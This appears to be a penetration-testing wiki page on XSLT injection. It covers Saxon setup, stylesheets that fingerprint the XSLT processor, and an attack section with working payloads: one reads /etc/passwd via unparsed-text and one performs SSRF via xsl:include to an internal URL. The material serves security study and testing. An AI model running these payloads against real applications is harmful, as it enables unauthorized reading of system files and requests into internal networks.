XSLT
Extensible Stylesheet Language Transformations
Extensible Stylesheet Language Transformations (XSLT) is an XML-based language usually used to transform XML documents into HTML, other XML, or PDF. The attack can occur when arbitrary loading of XSLT files is possible or when an application dynamically generates the XSL transformation XML document using non-user-validated input. Currently, there are 3 ( 1, 2, 3 ) XSLT versions. Version 1 is the least vulnerable due to limited built-in functionality.
Example
Saxon with XSLT version 2
sudo apt install default-jdk libsaxon-java libsaxonb-java
File
To see the results, we use the command-line parser
saxonb-xslt -xsl:transformation.xsl catalogue.xml
Find Underlying Preprocessor
They refer to the example above.
detection.xsl
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html"/>
<xsl:template match="/">
<h2>XSLT identification</h2>
<b>Version:</b> <xsl:value-of select="system-property('xsl:version')"/><br/>
<b>Vendor:</b> <xsl:value-of select="system-property('xsl:vendor')" /><br/>
<b>Vendor URL:</b><xsl:value-of select="system-property('xsl:vendor-url')" /><br/>
</xsl:template>
</xsl:stylesheet>
saxonb-xslt -xsl:detection.xsl catalogue.xml
fingerprinting.xsl
<?xml version="1.0" encoding="ISO-8859-1"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/">
Version: <xsl:value-of select="system-property('xsl:version')" /><br />
Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br /><xsl:if test="system-property('xsl:product-name')">
Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br /></xsl:if><xsl:if test="system-property('xsl:product-version')">
Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br /></xsl:if><xsl:if test="system-property('xsl:is-schema-aware')">
Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br /></xsl:if><xsl:if test="system-property('xsl:supports-serialization')">
Supports Serialization: <xsl:value-of select="system-property('xsl:supportsserialization')"/><br /></xsl:if><xsl:if test="system-property('xsl:supports-backwards-compatibility')">
Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supportsbackwards-compatibility')"/><br /></xsl:if></xsl:template></xsl:stylesheet>
saxonb-xslt -xsl:fingerprinting.xsl catalogue.xml
Attacks
Depending on the preprocessor, we can consult the XSLT documentation for that version to identify the functions of interest. Such as
unparsed-text
Used to read local files.
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>
saxonb-xslt -xsl:readfile.xsl catalogue.xml
xsl:include
Used to run SSRF.
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:include href="http://127.0.0.1:5000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>
saxonb-xslt -xsl:ssrf.xsl catalogue.xml
Wordlist for brute-forcing functionality.
Last updated
Was this helpful?